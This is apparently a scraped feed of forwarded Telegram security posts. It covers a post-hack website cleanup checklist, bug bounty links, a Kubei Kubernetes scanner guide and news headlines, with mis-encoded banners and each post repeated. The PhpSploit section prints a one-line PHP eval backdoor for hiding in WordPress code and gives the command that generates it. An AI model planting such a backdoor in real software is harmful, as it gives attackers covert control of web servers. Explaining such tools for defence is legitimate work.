Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to deal with after being hacked (web)
After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.
1. Immediately stop the website service to prevent users from continuing to be affected and to prevent other sites from continuing to be affected (recommended to use the 503 return code).
2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.
3. Clean up the hacked content that has been discovered, set the hacked page to a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.
4. Sort out the possible hacking time, compare it with the file modification time on the server, and process the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: The possible hacking time can be determined from the access log. However, the hacker may also modify the server's access log.
5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.
hope it can be helpful to everyone!"
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to deal with after being hacked (web)
After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.
1. Immediately stop the website service to prevent users from continuing to be affected and to prevent other sites from continuing to be affected (recommended to use the 503 return code).
2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.
3. Clean up the hacked content that has been discovered, set the hacked page to a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.
4. Sort out the possible hacking time, compare it with the file modification time on the server, and process the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: The possible hacking time can be determined from the access log. However, the hacker may also modify the server's access log.
5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.
hope it can be helpful to everyone!"
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦bug bounty pdfs and videos :
https://owasp.org/www-pdf-archive/Getting_Started_with_Bug_Bounty..pdf
https://www.diva-portal.org/smash/get/diva2:723516/FULLTEXT02.pdf
https://foundershield.com/wp-content/uploads/2018/02/state-of-bug-bounty-08-2015.compressed.pdf
https://www.govinfo.gov/content/pkg/CHRG-115shrg37302/pdf/CHRG-115shrg37302.pdf
https://www.youtube.com/watch?v=Qw1nNPiH_Go
1:22 h
https://www.bugcrowd.com/resources/webinars/bug-bounty-hunting-methodology-v2/
1 h
https://www.bugcrowd.com/resources/webinars/bug-bounty-hunter-methodology-v3/
1h 22
https://medium.com/inbughunters/getting-started-in-bug-bounty-7052da28445a
18 min
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦bug bounty pdfs and videos :
https://owasp.org/www-pdf-archive/Getting_Started_with_Bug_Bounty..pdf
https://www.diva-portal.org/smash/get/diva2:723516/FULLTEXT02.pdf
https://foundershield.com/wp-content/uploads/2018/02/state-of-bug-bounty-08-2015.compressed.pdf
https://www.govinfo.gov/content/pkg/CHRG-115shrg37302/pdf/CHRG-115shrg37302.pdf
https://www.youtube.com/watch?v=Qw1nNPiH_Go
1:22 h
https://www.bugcrowd.com/resources/webinars/bug-bounty-hunting-methodology-v2/
1 h
https://www.bugcrowd.com/resources/webinars/bug-bounty-hunter-methodology-v3/
1h 22
https://medium.com/inbughunters/getting-started-in-bug-bounty-7052da28445a
18 min
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is PhpSploit ?
1) PhpSploit is a remote control framework that aims to provide a covert interactive connection, over HTTP, similar to a shell between a client and a web server.
2) It is a follow-up tool capable of maintaining access to a compromised web server for privilege escalation. A fully functional C2 framework that is invisibly stored on a web server as a one-liner backdoor in PHP
3) When you run PhpSploit and generate a standard backdoor for hosting in WordPress or PHP code, the following line will be created, which is a full-fledged backdoor:
<? php @eval ($ _ SERVER ['HTTP_PHPSPL01T']); ?>
4) The above code can be generated by running the following command:
phpsploit --interactive --eval "backdoor"
5) Just one find, ClamAV detects the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY like this:
set PASSKEY xy...
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what is PhpSploit ?
1) PhpSploit is a remote control framework that aims to provide a covert interactive connection, over HTTP, similar to a shell between a client and a web server.
2) It is a follow-up tool capable of maintaining access to a compromised web server for privilege escalation. A fully functional C2 framework that is invisibly stored on a web server as a one-liner backdoor in PHP
3) When you run PhpSploit and generate a standard backdoor for hosting in WordPress or PHP code, the following line will be created, which is a full-fledged backdoor:
<? php @eval ($ _ SERVER ['HTTP_PHPSPL01T']); ?>
4) The above code can be generated by running the following command:
phpsploit --interactive --eval "backdoor"
5) Just one find, ClamAV detects the backdoor as Php.Trojan.PhpSploit-7157376-0.
If we then run phpsploit again and set another PASSKEY like this:
set PASSKEY xy...
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Android_app_vulnerability_classes.pdf
332 KB
Overview of common Android app vulnerabilities reported through the Google Play Security Rewards Program β Explicitly not an attempt at creating a complete audit guide β Focused only to vulnerabilities in scope for our bug bounty β For each vulnerability present β Overview β Auditing tips β Remediation tips β Bug bounty pay-out β CWE ID (Common Weakness Enumeration) and other resources
Forwarded from UNDERCODE NEWS
Apple's "chip dream" evaporates Qualcomm 85 billion. Who will be the next supplier to be eliminated?
#Technologies
#Technologies
Forwarded from UNDERCODE NEWS
Behind recycled lithium batteries, the profiteering industry: The recycling market alone hits 117.8 billion
#international
#international
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Russian hackers have been in and out of the US Treasury and Commerce Departments for over a year.
#CyberAttacks
#CyberAttacks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦βΈοΈ How to test a Kubernetes cluster for vulnerabilities?
1) ubei is a vulnerability scanning tool that allows users to get an accurate and immediate risk assessment of their Kubernetes clusters.
2) Kubei scans all images that are in use in the Kubernetes cluster, including application and system pods images.
3) It does not scan image registries and does not require prior integration with CI / CD pipelines.
4) It is a customizable tool that allows users to determine the scope of the scan (target namespaces), speed and level of interest.
5) The tool also provides a graphical interface that allows an administrator to determine where and what should be replaced in order to mitigate the impact of discovered vulnerabilities.
6) Requirements
The Kubernetes cluster is already up and running and kubeconfig (~ / .kube / config) is correctly configured on the target cluster.
And use
7) Run the following command to deploy Kubei to the cluster:
kubectl apply -f https://raw.githubusercontent.com/Portshift/kubei/master/deploy/kubei.yaml
8) Run the following command to make sure Kubei is up and running:
kubectl -n kubei get pod -lapp=kubei
9) Then forward the port to the Kubei web app with the following command:
kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080
βΈοΈ How to use port forwarding in containers deployed in a Kubernetes cluster
In your browser, go to http: // localhost: 8080 / view / and then click GO to start the scan.
To check the status of Kubei and the progress of the current scan, run the following command:
kubectl -n kubei logs $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}')
Refresh the page (http: // localhost: 8080 / view /) to update the results.
]
If some pods are stuck in Waiting status, you can solve this error with:
kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦βΈοΈ How to test a Kubernetes cluster for vulnerabilities?
1) ubei is a vulnerability scanning tool that allows users to get an accurate and immediate risk assessment of their Kubernetes clusters.
2) Kubei scans all images that are in use in the Kubernetes cluster, including application and system pods images.
3) It does not scan image registries and does not require prior integration with CI / CD pipelines.
4) It is a customizable tool that allows users to determine the scope of the scan (target namespaces), speed and level of interest.
5) The tool also provides a graphical interface that allows an administrator to determine where and what should be replaced in order to mitigate the impact of discovered vulnerabilities.
6) Requirements
The Kubernetes cluster is already up and running and kubeconfig (~ / .kube / config) is correctly configured on the target cluster.
And use
7) Run the following command to deploy Kubei to the cluster:
kubectl apply -f https://raw.githubusercontent.com/Portshift/kubei/master/deploy/kubei.yaml
8) Run the following command to make sure Kubei is up and running:
kubectl -n kubei get pod -lapp=kubei
9) Then forward the port to the Kubei web app with the following command:
kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080
βΈοΈ How to use port forwarding in containers deployed in a Kubernetes cluster
In your browser, go to http: // localhost: 8080 / view / and then click GO to start the scan.
To check the status of Kubei and the progress of the current scan, run the following command:
kubectl -n kubei logs $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}')
Refresh the page (http: // localhost: 8080 / view /) to update the results.
]
If some pods are stuck in Waiting status, you can solve this error with:
kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
